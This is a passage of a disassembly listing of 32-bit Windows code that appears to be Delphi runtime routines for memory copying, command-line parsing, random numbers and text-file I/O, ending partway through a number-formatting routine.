lea eax, [ecx+eax-8]
lea ecx, [edx+ecx-8]
fild qword ptr [eax]
push ecx
neg ecx
and edx, 0FFFFFFF8h
lea ecx, [edx+ecx+8]
pop edx
loc_40002E70: ; CODE XREF: sub_40002DFC+7D�j
fild qword ptr [ecx+eax]
fistp qword ptr [ecx+edx]
add ecx, 8
jl short loc_40002E70
fistp qword ptr [edx]
pop edx
fistp qword ptr [edx]
retn
; ---------------------------------------------------------------------------
loc_40002E81: ; CODE XREF: sub_40002DFC+7�j
jle short locret_40002EB1
cmp eax, edx
ja short loc_40002E58
sub edx, ecx
cmp eax, edx
lea edx, [ecx+edx]
jbe short loc_40002E58
sub ecx, 8
push ecx
fild qword ptr [ecx+eax]
fild qword ptr [eax]
add ecx, edx
and ecx, 0FFFFFFF8h
sub ecx, edx
loc_40002EA0: ; CODE XREF: sub_40002DFC+AD�j
fild qword ptr [ecx+eax]
fistp qword ptr [ecx+edx]
sub ecx, 8
jg short loc_40002EA0
pop ecx
fistp qword ptr [edx]
fistp qword ptr [ecx+edx]
locret_40002EB1: ; CODE XREF: sub_40002DFC:loc_40002E81�j
retn
; ---------------------------------------------------------------------------
loc_40002EB2: ; DATA XREF: sub_40002DFC+3C�o
movzx ecx, byte ptr [eax]
mov [edx], cl
retn
; ---------------------------------------------------------------------------
loc_40002EB8: ; DATA XREF: sub_40002DFC+40�o
movzx ecx, word ptr [eax]
mov [edx], cx
retn
; ---------------------------------------------------------------------------
loc_40002EBF: ; DATA XREF: sub_40002DFC+44�o
mov cx, [eax]
mov al, [eax+2]
mov [edx], cx
mov [edx+2], al
retn
; ---------------------------------------------------------------------------
loc_40002ECC: ; DATA XREF: sub_40002DFC+48�o
mov ecx, [eax]
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_40002ED1: ; DATA XREF: sub_40002DFC+4C�o
mov ecx, [eax]
mov al, [eax+4]
mov [edx], ecx
mov [edx+4], al
retn
; ---------------------------------------------------------------------------
loc_40002EDC: ; DATA XREF: sub_40002DFC+50�o
mov ecx, [eax]
mov ax, [eax+4]
mov [edx], ecx
mov [edx+4], ax
retn
; ---------------------------------------------------------------------------
loc_40002EE9: ; DATA XREF: sub_40002DFC+54�o
mov ecx, [eax]
mov eax, [eax+3]
mov [edx], ecx
mov [edx+3], eax
retn
; ---------------------------------------------------------------------------
loc_40002EF4: ; CODE XREF: sub_40002DFC+E�j
; DATA XREF: sub_40002DFC:off_40002E54�o
fild qword ptr [eax]
fistp qword ptr [edx]
retn
sub_40002DFC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002EFC proc near ; CODE XREF: sub_40002FF8+41�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov esi, edx
mov ebx, eax
jmp short loc_40002F0F
; ---------------------------------------------------------------------------
loc_40002F07: ; CODE XREF: sub_40002EFC+1B�j
push ebx
call sub_400011A0 ; CharNextA
mov ebx, eax
loc_40002F0F: ; CODE XREF: sub_40002EFC+9�j
; sub_40002EFC+2B�j
cmp byte ptr [ebx], 0
jz short loc_40002F19
cmp byte ptr [ebx], 20h
jbe short loc_40002F07
loc_40002F19: ; CODE XREF: sub_40002EFC+16�j
cmp byte ptr [ebx], 22h
jnz short loc_40002F29
cmp byte ptr [ebx+1], 22h
jnz short loc_40002F29
add ebx, 2
jmp short loc_40002F0F
; ---------------------------------------------------------------------------
loc_40002F29: ; CODE XREF: sub_40002EFC+20�j
; sub_40002EFC+26�j
xor ebp, ebp
mov [esp+14h+var_14], ebx
jmp short loc_40002F78
; ---------------------------------------------------------------------------
loc_40002F30: ; CODE XREF: sub_40002EFC+7F�j
cmp byte ptr [ebx], 22h
jnz short loc_40002F68
push ebx
call sub_400011A0 ; CharNextA
mov ebx, eax
jmp short loc_40002F4F
; ---------------------------------------------------------------------------
loc_40002F3F: ; CODE XREF: sub_40002EFC+5B�j
push ebx
call sub_400011A0 ; CharNextA
mov edi, eax
mov eax, edi
sub eax, ebx
add ebp, eax
mov ebx, edi
loc_40002F4F: ; CODE XREF: sub_40002EFC+41�j
cmp byte ptr [ebx], 0
jz short loc_40002F59
cmp byte ptr [ebx], 22h
jnz short loc_40002F3F
loc_40002F59: ; CODE XREF: sub_40002EFC+56�j
cmp byte ptr [ebx], 0
jz short loc_40002F78
push ebx
call sub_400011A0 ; CharNextA
mov ebx, eax
jmp short loc_40002F78
; ---------------------------------------------------------------------------
loc_40002F68: ; CODE XREF: sub_40002EFC+37�j
push ebx
call sub_400011A0 ; CharNextA
mov edi, eax
mov eax, edi
sub eax, ebx
add ebp, eax
mov ebx, edi
loc_40002F78: ; CODE XREF: sub_40002EFC+32�j
; sub_40002EFC+60�j ...
cmp byte ptr [ebx], 20h
ja short loc_40002F30
mov eax, esi
mov edx, ebp
call sub_40004F74
mov ebx, [esp+14h+var_14]
mov ebp, [esi]
xor esi, esi
jmp short loc_40002FE9
; ---------------------------------------------------------------------------
loc_40002F8F: ; CODE XREF: sub_40002EFC+F0�j
cmp byte ptr [ebx], 22h
jnz short loc_40002FD0
push ebx
call sub_400011A0 ; CharNextA
mov ebx, eax
jmp short loc_40002FB7
; ---------------------------------------------------------------------------
loc_40002F9E: ; CODE XREF: sub_40002EFC+C3�j
push ebx
call sub_400011A0 ; CharNextA
mov edi, eax
cmp edi, ebx
jbe short loc_40002FB7
loc_40002FAA: ; CODE XREF: sub_40002EFC+B9�j
movzx eax, byte ptr [ebx]
mov [ebp+esi+0], al
inc ebx
inc esi
cmp edi, ebx
ja short loc_40002FAA
loc_40002FB7: ; CODE XREF: sub_40002EFC+A0�j
; sub_40002EFC+AC�j
cmp byte ptr [ebx], 0
jz short loc_40002FC1
cmp byte ptr [ebx], 22h
jnz short loc_40002F9E
loc_40002FC1: ; CODE XREF: sub_40002EFC+BE�j
cmp byte ptr [ebx], 0
jz short loc_40002FE9
push ebx
call sub_400011A0 ; CharNextA
mov ebx, eax
jmp short loc_40002FE9
; ---------------------------------------------------------------------------
loc_40002FD0: ; CODE XREF: sub_40002EFC+96�j
push ebx
call sub_400011A0 ; CharNextA
mov edi, eax
cmp edi, ebx
jbe short loc_40002FE9
loc_40002FDC: ; CODE XREF: sub_40002EFC+EB�j
movzx eax, byte ptr [ebx]
mov [ebp+esi+0], al
inc ebx
inc esi
cmp edi, ebx
ja short loc_40002FDC
loc_40002FE9: ; CODE XREF: sub_40002EFC+91�j
; sub_40002EFC+C8�j ...
cmp byte ptr [ebx], 20h
ja short loc_40002F8F
mov eax, ebx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40002EFC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002FF8 proc near ; CODE XREF: sub_400171BC+83�p
; sub_400171BC+D6�p ...
var_114 = byte ptr -114h
push ebx
push esi
push edi
add esp, 0FFFFFEF8h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_40004884
test esi, esi
jnz short loc_4000302E
push 105h
lea eax, [esp+118h+var_114]
push eax
push 0
call sub_400011E8 ; GetModuleFileNameA
mov ecx, eax
mov edx, esp
mov eax, ebx
call sub_40004974
jmp short loc_4000304C
; ---------------------------------------------------------------------------
loc_4000302E: ; CODE XREF: sub_40002FF8+16�j
call sub_400011D0 ; GetCommandLineA
mov edi, eax
loc_40003035: ; CODE XREF: sub_40002FF8+52�j
mov edx, ebx
mov eax, edi
call sub_40002EFC
mov edi, eax
test esi, esi
jz short loc_4000304C
cmp dword ptr [ebx], 0
jz short loc_4000304C
dec esi
jmp short loc_40003035
; ---------------------------------------------------------------------------
loc_4000304C: ; CODE XREF: sub_40002FF8+34�j
; sub_40002FF8+4A�j ...
add esp, 108h
pop edi
pop esi
pop ebx
retn
sub_40002FF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003058 proc near ; CODE XREF: sub_40017F10+3�p
var_8 = dword ptr -8
add esp, 0FFFFFFF8h
push esp
call sub_40001290 ; QueryPerformanceCounter
test eax, eax
jz short loc_40003070
mov eax, [esp+8+var_8]
mov dword_4001A008, eax
pop ecx
pop edx
retn
; ---------------------------------------------------------------------------
loc_40003070: ; CODE XREF: sub_40003058+B�j
call sub_40001298 ; GetTickCount
mov dword_4001A008, eax
pop ecx
pop edx
retn
sub_40003058 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003080 proc near ; CODE XREF: sub_40017F10+D�p
; .itext:40019927�p ...
push ebx
xor ebx, ebx
imul edx, dword_4001A008[ebx], 8088405h
inc edx
mov dword_4001A008[ebx], edx
mul edx
mov eax, edx
pop ebx
retn
sub_40003080 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000309C proc near ; CODE XREF: sub_40005754+62�p
; sub_40005754+7A�p
cmp al, 61h
jb short locret_400030A6
cmp al, 7Ah
ja short locret_400030A6
sub al, 20h
locret_400030A6: ; CODE XREF: sub_4000309C+2�j
; sub_4000309C+6�j
retn
sub_4000309C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400030A8 proc near ; CODE XREF: sub_4000ED90+D4�p
; sub_4000ED90+F5�p ...
var_8 = qword ptr -8
sub esp, 8
fistp [esp+8+var_8]
wait
pop eax
pop edx
retn
sub_400030A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_400030B4 proc near ; CODE XREF: sub_40003EC8+10�j
; DATA XREF: .text:4000D688�o ...
cmp ds:off_4001C02C, 0
jz short loc_400030C3
call ds:off_4001C02C
loc_400030C3: ; CODE XREF: sub_400030B4+7�j
mov eax, 0D2h
jmp sub_40004878
sub_400030B4 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400030D0 proc near ; DATA XREF: .text:400031AC�o
push ebx
mov ebx, eax
xor eax, eax
mov [ebx+10h], eax
xor eax, eax
mov [ebx+0Ch], eax
push 0
lea eax, [ebx+10h]
push eax
mov eax, [ebx+8]
push eax
mov eax, [ebx+14h]
push eax
mov eax, [ebx]
push eax
call sub_40001170 ; ReadFile
test eax, eax
jnz short loc_40003105
call sub_400011D8 ; RtlGetLastWin32Error
cmp eax, 6Dh
jnz short loc_40003107
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40003105: ; CODE XREF: sub_400030D0+25�j
xor eax, eax
loc_40003107: ; CODE XREF: sub_400030D0+2F�j
pop ebx
retn
sub_400030D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000310C proc near ; DATA XREF: .text:400031E3�o
; .text:400032B3�o ...
xor eax, eax
retn
sub_4000310C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003110 proc near ; DATA XREF: .text:loc_400031D5�o
; .text:400032FB�o
var_C = byte ptr -0Ch
push ebx
push esi
push ecx
mov ebx, eax
mov esi, [ebx+0Ch]
test esi, esi
jnz short loc_40003120
xor eax, eax
jmp short loc_40003146
; ---------------------------------------------------------------------------
loc_40003120: ; CODE XREF: sub_40003110+A�j
push 0
lea eax, [esp+10h+var_C]
push eax
push esi
mov eax, [ebx+14h]
push eax
mov eax, [ebx]
push eax
call sub_40001198 ; WriteFile
test eax, eax
jnz short loc_4000313F
call sub_400011D8 ; RtlGetLastWin32Error
jmp short loc_40003141
; ---------------------------------------------------------------------------
loc_4000313F: ; CODE XREF: sub_40003110+26�j
xor eax, eax
loc_40003141: ; CODE XREF: sub_40003110+2D�j
xor edx, edx
mov [ebx+0Ch], edx
loc_40003146: ; CODE XREF: sub_40003110+E�j
pop edx
pop esi
pop ebx
retn
sub_40003110 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000314C proc near ; CODE XREF: sub_4000315C+B�p
; sub_4000361C+E�p
push ebx
mov ebx, eax
push ebx
call sub_40001140 ; CloseHandle
dec eax
setz al
pop ebx
retn
sub_4000314C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000315C proc near ; DATA XREF: .text:loc_400031DC�o
push ebx
mov ebx, eax
mov word ptr [ebx+4], 0D7B0h
mov eax, [ebx]
call sub_4000314C
test al, al
jnz short loc_40003177
call sub_400011D8 ; RtlGetLastWin32Error
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40003177: ; CODE XREF: sub_4000315C+12�j
xor eax, eax
pop ebx
retn
sub_4000315C endp
; ---------------------------------------------------------------------------
align 4
loc_4000317C: ; DATA XREF: sub_40003328+35�o
push esi
mov esi, eax
xor eax, eax
mov [esi+0Ch], eax
mov [esi+10h], eax
mov ax, [esi+4]
sub eax, 0D7B1h
jz short loc_4000319D
dec eax
jz short loc_400031B5
dec eax
jz short loc_400031C6
jmp loc_40003304
; ---------------------------------------------------------------------------
loc_4000319D: ; CODE XREF: .text:40003190�j
mov eax, 80000000h
mov edx, 1
mov ecx, 3
mov dword ptr [esi+1Ch], offset sub_400030D0
jmp short loc_400031DC
; ---------------------------------------------------------------------------
loc_400031B5: ; CODE XREF: .text:40003193�j
mov eax, 40000000h
mov edx, 1
mov ecx, 2
jmp short loc_400031D5
; ---------------------------------------------------------------------------
loc_400031C6: ; CODE XREF: .text:40003196�j
mov eax, 0C0000000h
mov edx, 1
mov ecx, 3
loc_400031D5: ; CODE XREF: .text:400031C4�j
mov dword ptr [esi+1Ch], offset sub_40003110
loc_400031DC: ; CODE XREF: .text:400031B3�j
mov dword ptr [esi+24h], offset sub_4000315C
mov dword ptr [esi+20h], offset sub_4000310C
cmp byte ptr [esi+48h], 0
jz loc_400032A6
push 0
push 80h
push ecx
push 0
push edx
push eax
lea eax, [esi+48h]
push eax
call sub_40001148 ; CreateFileA
cmp eax, 0FFFFFFFFh
jz loc_4000331A
mov [esi], eax
cmp word ptr [esi+4], 0D7B3h
jnz loc_400032E3
dec word ptr [esi+4]
push 0
push dword ptr [esi]
call sub_40001158 ; GetFileSize
inc eax
jz loc_4000331A
sub eax, 81h
jnb short loc_4000323D
xor eax, eax
loc_4000323D: ; CODE XREF: .text:40003239�j
push 0
push 0
push eax
push dword ptr [esi]
call sub_40001188 ; SetFilePointer
inc eax
jz loc_4000331A
push 0
mov edx, esp
push 0
push edx
push 80h
lea edx, [esi+14Ch]
push edx
push dword ptr [esi]
call sub_40001170 ; ReadFile
pop edx
dec eax
jnz loc_4000331A
xor eax, eax
loc_40003274: ; CODE XREF: .text:40003283�j
cmp eax, edx
jnb short loc_400032E3
cmp byte ptr [esi+eax+14Ch], 0Eh
jz short loc_40003285
inc eax
jmp short loc_40003274
; ---------------------------------------------------------------------------
loc_40003285: ; CODE XREF: .text:40003280�j
push 2
push 0
sub eax, edx
push eax
push dword ptr [esi]
call sub_40001188 ; SetFilePointer
inc eax
jz loc_4000331A
push dword ptr [esi]
call sub_40001180 ; SetEndOfFile
dec eax
jnz short loc_4000331A
jmp short loc_400032E3
; ---------------------------------------------------------------------------
loc_400032A6: ; CODE XREF: .text:400031EE�j
lea eax, [esi+14Ch]
mov dword ptr [esi+8], 80h
mov dword ptr [esi+24h], offset sub_4000310C
mov [esi+14h], eax
cmp word ptr [esi+4], 0D7B2h
jz short loc_400032C9
push 0FFFFFFF6h
jmp short loc_400032D7
; ---------------------------------------------------------------------------
loc_400032C9: ; CODE XREF: .text:400032C3�j
cmp esi, offset dword_4001C3E8
jnz short loc_400032D5
push 0FFFFFFF4h
jmp short loc_400032D7
; ---------------------------------------------------------------------------
loc_400032D5: ; CODE XREF: .text:400032CF�j
push 0FFFFFFF5h
loc_400032D7: ; CODE XREF: .text:400032C7�j
; .text:400032D3�j
call sub_40001160 ; GetStdHandle
cmp eax, 0FFFFFFFFh
jz short loc_4000331A
mov [esi], eax
loc_400032E3: ; CODE XREF: .text:4000321A�j
; .text:40003276�j ...
cmp word ptr [esi+4], 0D7B1h
jz short loc_40003302
push dword ptr [esi]
call sub_40001150 ; GetFileType
test eax, eax
jz short loc_40003306
cmp eax, 2
jnz short loc_40003302
mov dword ptr [esi+20h], offset sub_40003110
loc_40003302: ; CODE XREF: .text:400032E9�j
; .text:400032F9�j
xor eax, eax
loc_40003304: ; CODE XREF: .text:40003198�j
; .text:40003318�j ...
pop esi
retn
; ---------------------------------------------------------------------------
loc_40003306: ; CODE XREF: .text:400032F4�j
push dword ptr [esi]
call sub_40001140 ; CloseHandle
mov word ptr [esi+4], 0D7B0h
mov eax, 69h
jmp short loc_40003304
; ---------------------------------------------------------------------------
loc_4000331A: ; CODE XREF: .text:4000320C�j
; .text:4000322E�j ...
mov word ptr [esi+4], 0D7B0h
call sub_400011D8 ; RtlGetLastWin32Error
jmp short loc_40003304
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40003328 proc near ; CODE XREF: .itext:400199DC�p
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, ebx
xor ecx, ecx
mov edx, 14Ch
call sub_40003580
lea eax, [ebx+14Ch]
mov [ebx+14h], eax
mov word ptr [ebx+4], 0D7B0h
movzx eax, byte_4001A034
mov [ebx+6], ax
mov dword ptr [ebx+8], 80h
mov dword ptr [ebx+18h], offset loc_4000317C
mov eax, esi
call sub_40004B44
push eax
mov eax, esi
call sub_40004D48
lea edx, [ebx+48h]
pop ecx
call sub_40002DFC
mov eax, esi
call sub_40004B44
mov byte ptr [ebx+eax+48h], 0
xor eax, eax
pop esi
pop ebx
retn
sub_40003328 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003390 proc near ; CODE XREF: sub_400033D8+3�p
push ebx
movzx ecx, word ptr [eax+4]
sub cx, 0D7B1h
jz short loc_400033AB
dec ecx
sub cx, 2
jnb short loc_400033AF
mov ebx, edx
call ebx
mov ebx, eax
jmp short loc_400033C6
; ---------------------------------------------------------------------------
loc_400033AB: ; CODE XREF: sub_40003390+A�j
xor ebx, ebx
jmp short loc_400033C6
; ---------------------------------------------------------------------------
loc_400033AF: ; CODE XREF: sub_40003390+11�j
cmp eax, offset dword_4001C21C
jz short loc_400033BD
cmp eax, offset dword_4001C3E8
jnz short loc_400033C1
loc_400033BD: ; CODE XREF: sub_40003390+24�j
xor ebx, ebx
jmp short loc_400033C6
; ---------------------------------------------------------------------------
loc_400033C1: ; CODE XREF: sub_40003390+2B�j
mov ebx, 67h
loc_400033C6: ; CODE XREF: sub_40003390+19�j
; sub_40003390+1D�j ...
test ebx, ebx
jz short loc_400033D1
mov eax, ebx
call sub_40002D7C
loc_400033D1: ; CODE XREF: sub_40003390+38�j
mov eax, ebx
pop ebx
retn
sub_40003390 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400033D8 proc near ; CODE XREF: sub_4000AF68+23�p
mov edx, [eax+1Ch]
call sub_40003390
retn
sub_400033D8 endp
; ---------------------------------------------------------------------------
align 4
loc_400033E4: ; DATA XREF: sub_4000347C+D�o
jmp ds:dword_40024480
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400033EC proc near ; CODE XREF: sub_4000347C+14�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, ecx
mov edi, edx
mov ebx, eax
mov eax, [ebp+arg_8]
movzx edx, word ptr [ebx+4]
and edx, eax
cmp eax, edx
jnz short loc_40003460
push 0
lea eax, [ebp+var_4]
push eax
mov eax, [ebx+8]
imul esi
push eax
push edi
mov eax, [ebx]
push eax
call [ebp+arg_4]
test eax, eax
jnz short loc_4000342E
call sub_400011D8 ; RtlGetLastWin32Error
call sub_40002D7C
xor eax, eax
mov [ebp+var_4], eax
jmp short loc_4000346F
; ---------------------------------------------------------------------------
loc_4000342E: ; CODE XREF: sub_400033EC+2F�j
mov ecx, [ebx+8]
mov eax, [ebp+var_4]
xor edx, edx
div ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
test eax, eax
jz short loc_4000344C
mov eax, [ebp+arg_C]
mov edx, [ebp+var_4]
mov [eax], edx
jmp short loc_4000346F
; ---------------------------------------------------------------------------
loc_4000344C: ; CODE XREF: sub_400033EC+54�j
cmp esi, [ebp+var_4]
jz short loc_4000346F
mov eax, [ebp+arg_0]
call sub_40002D7C
xor eax, eax
mov [ebp+var_4], eax
jmp short loc_4000346F
; ---------------------------------------------------------------------------
loc_40003460: ; CODE XREF: sub_400033EC+18�j
mov eax, 67h
call sub_40002D7C
xor eax, eax
mov [ebp+var_4], eax
loc_4000346F: ; CODE XREF: sub_400033EC+40�j
; sub_400033EC+5E�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 10h
sub_400033EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000347C proc near ; CODE XREF: .itext:40019A30�p
; .itext:40019A56�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push ebx
push 0D7B2h
push offset loc_400033E4
push 65h
call sub_400033EC
pop ebx
pop ebp
retn 4
sub_4000347C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000349C proc near ; CODE XREF: sub_40006350+1E�p
; sub_40006350+28�p ...
push ebx
push esi
mov ebx, eax
xor esi, esi
movzx eax, word ptr [ebx+4]
cmp ax, 0D7B1h
jb short loc_400034DB
cmp ax, 0D7B3h
ja short loc_400034DB
and ax, 0D7B2h
cmp ax, 0D7B2h
jnz short loc_400034C3
mov eax, ebx
call dword ptr [ebx+1Ch]
mov esi, eax
loc_400034C3: ; CODE XREF: sub_4000349C+1E�j
test esi, esi
jnz short loc_400034CE
mov eax, ebx
call dword ptr [ebx+24h]
mov esi, eax
loc_400034CE: ; CODE XREF: sub_4000349C+29�j
test esi, esi
jz short loc_400034ED
mov eax, esi
call sub_40002D7C
jmp short loc_400034ED
; ---------------------------------------------------------------------------
loc_400034DB: ; CODE XREF: sub_4000349C+E�j
; sub_4000349C+14�j
cmp ebx, offset dword_4001C050
jz short loc_400034ED
mov eax, 67h
call sub_40002D7C
loc_400034ED: ; CODE XREF: sub_4000349C+34�j
; sub_4000349C+3D�j ...
mov eax, esi
pop esi
pop ebx
retn
sub_4000349C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400034F4 proc near ; CODE XREF: .text:40015A44�p
push ebx
movzx ebx, byte ptr [edx]
cmp cl, bl
jbe short loc_400034FE
mov ecx, ebx
loc_400034FE: ; CODE XREF: sub_400034F4+6�j
mov [eax], cl
inc edx
inc eax
movzx ecx, cl
xchg eax, edx
call sub_40002DFC
pop ebx
retn
sub_400034F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003510 proc near ; CODE XREF: sub_40014F60+1B�p
push ebx
push esi
push ecx
mov esi, ecx
shr esi, 2
jz short loc_40003540
loc_4000351A: ; CODE XREF: sub_40003510+26�j
mov ecx, [eax]
mov ebx, [edx]
cmp ecx, ebx
jnz short loc_40003567
dec esi
jz short loc_4000353A
mov ecx, [eax+4]
mov ebx, [edx+4]
cmp ecx, ebx
jnz short loc_40003567
add eax, 8
add edx, 8
dec esi
jnz short loc_4000351A
jmp short loc_40003540
; ---------------------------------------------------------------------------
loc_4000353A: ; CODE XREF: sub_40003510+13�j
add eax, 4
add edx, 4
loc_40003540: ; CODE XREF: sub_40003510+8�j
; sub_40003510+28�j
pop esi
and esi, 3
jz short loc_4000357C
mov cl, [eax]
cmp cl, [edx]
jnz short loc_4000357C
dec esi
jz short loc_40003562
mov cl, [eax+1]
cmp cl, [edx+1]
jnz short loc_4000357C
dec esi
jz short loc_40003562
mov cl, [eax+2]
cmp cl, [edx+2]
jnz short loc_4000357C
loc_40003562: ; CODE XREF: sub_40003510+3D�j
; sub_40003510+48�j
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40003567: ; CODE XREF: sub_40003510+10�j
; sub_40003510+1D�j
pop esi
cmp cl, bl
jnz short loc_4000357C
cmp ch, bh
jnz short loc_4000357C
shr ecx, 10h
shr ebx, 10h
cmp cl, bl
jnz short loc_4000357C
cmp ch, bh
loc_4000357C: ; CODE XREF: sub_40003510+34�j
; sub_40003510+3A�j ...
pop esi
pop ebx
retn
sub_40003510 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003580 proc near ; CODE XREF: sub_40002540+2C�p
; sub_40002540+3E�p ...
cmp edx, 20h
mov ch, cl
jl short loc_400035C4
mov [eax], cx
mov [eax+2], cx
mov [eax+4], cx
mov [eax+6], cx
sub edx, 10h
fld qword ptr [eax]
fst qword ptr [edx+eax]
fst qword ptr [edx+eax+8]
mov ecx, eax
and ecx, 7
sub ecx, 8
sub eax, ecx
add edx, ecx
add eax, edx
neg edx
loc_400035B2: ; CODE XREF: sub_40003580+3C�j
fst qword ptr [edx+eax]
fst qword ptr [edx+eax+8]
add edx, 10h
jl short loc_400035B2
ffree st
retn
; ---------------------------------------------------------------------------
align 4
loc_400035C4: ; CODE XREF: sub_40003580+5�j
test edx, edx
jle short nullsub_1
mov [edx+eax-1], cl
and edx, 0FFFFFFFEh
neg edx
lea edx, nullsub_1[edx*2]
jmp edx
sub_40003580 endp
; ---------------------------------------------------------------------------
align 4
mov [eax+1Ch], cx
mov [eax+1Ah], cx
mov [eax+18h], cx
mov [eax+16h], cx
mov [eax+14h], cx
mov [eax+12h], cx
mov [eax+10h], cx
mov [eax+0Eh], cx
mov [eax+0Ch], cx
mov [eax+0Ah], cx
mov [eax+8], cx
mov [eax+6], cx
mov [eax+4], cx
mov [eax+2], cx
mov [eax], cx
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_4000361C proc near ; DATA XREF: sub_40003644+35�o
push ebx
push esi
mov ebx, eax
mov word ptr [ebx+4], 0D7B0h
xor esi, esi
mov eax, [ebx]
call sub_4000314C
test al, al
jnz short loc_4000363D
call sub_40002D8C
mov esi, 1
loc_4000363D: ; CODE XREF: sub_4000361C+15�j
mov eax, esi
pop esi
pop ebx
retn
sub_4000361C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003644 proc near ; CODE XREF: sub_40003724+5�p
push ebx
push esi
push edi
mov esi, edx
mov edi, ecx
xor edx, edx
mov ebx, eax
mov dx, [eax+4]
sub edx, 0D7B0h
jz short loc_40003670
cmp edx, 3
ja loc_40003706
call dword ptr [ebx+24h]
test eax, eax
jz short loc_40003670
call sub_40002D7C
loc_40003670: ; CODE XREF: sub_40003644+15�j
; sub_40003644+25�j
mov word ptr [ebx+4], 0D7B3h
mov [ebx+8], esi
mov dword ptr [ebx+24h], offset sub_4000361C
mov dword ptr [ebx+1Ch], offset sub_4000310C
cmp byte ptr [ebx+48h], 0
jz short loc_400036ED
mov eax, 0C0000000h
mov dl, byte_4001A00C
and edx, 70h
shr edx, 2
mov edx, dword_4001A758[edx]
mov ecx, 2
sub edi, 3
jz short loc_400036CF
mov ecx, 3
inc edi
jz short loc_400036CF
mov eax, 40000000h
inc edi
mov word ptr [ebx+4], 0D7B2h
jz short loc_400036CF
mov eax, 80000000h
mov word ptr [ebx+4], 0D7B1h
loc_400036CF: ; CODE XREF: sub_40003644+68�j
; sub_40003644+70�j ...
push 0
push 80h
push ecx
push 0
push edx
push eax
lea eax, [ebx+48h]
push eax
call sub_40001148 ; CreateFileA
loc_400036E4: ; CODE XREF: sub_40003644+C0�j
cmp eax, 0FFFFFFFFh
jz short loc_4000370D
mov [ebx], eax
jmp short loc_4000371D
; ---------------------------------------------------------------------------
loc_400036ED: ; CODE XREF: sub_40003644+47�j
mov dword ptr [ebx+24h], offset sub_4000310C
cmp edi, 3
jz short loc_400036FD
push 0FFFFFFF6h
jmp short loc_400036FF
; ---------------------------------------------------------------------------
loc_400036FD: ; CODE XREF: sub_40003644+B3�j
push 0FFFFFFF5h
loc_400036FF: ; CODE XREF: sub_40003644+B7�j
call sub_40001160 ; GetStdHandle
jmp short loc_400036E4
; ---------------------------------------------------------------------------
loc_40003706: ; CODE XREF: sub_40003644+1A�j
mov eax, 66h
jmp short loc_40003718
; ---------------------------------------------------------------------------
loc_4000370D: ; CODE XREF: sub_40003644+A3�j
mov word ptr [ebx+4], 0D7B0h
call sub_400011D8 ; RtlGetLastWin32Error
loc_40003718: ; CODE XREF: sub_40003644+C7�j
call sub_40002D7C
loc_4000371D: ; CODE XREF: sub_40003644+A7�j
pop edi
pop esi
pop ebx
retn
sub_40003644 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40003724 proc near ; CODE XREF: .itext:400199EB�p
mov ecx, 3
call sub_40003644
retn
sub_40003724 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40003730 proc near ; CODE XREF: sub_40003790+4�p
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_10 = dword ptr -10h
push ebx
push esi
push edi
push edx
sub esp, 14h
mov edi, ecx
mov esi, eax
cdq
xor eax, edx
sub eax, edx
mov ecx, 0Ah
xor ebx, ebx
loc_40003747: ; CODE XREF: sub_40003730+24�j
xor edx, edx
div ecx
add edx, 30h
mov [esp+ebx+24h+var_24], dl
inc ebx
test eax, eax
jnz short loc_40003747
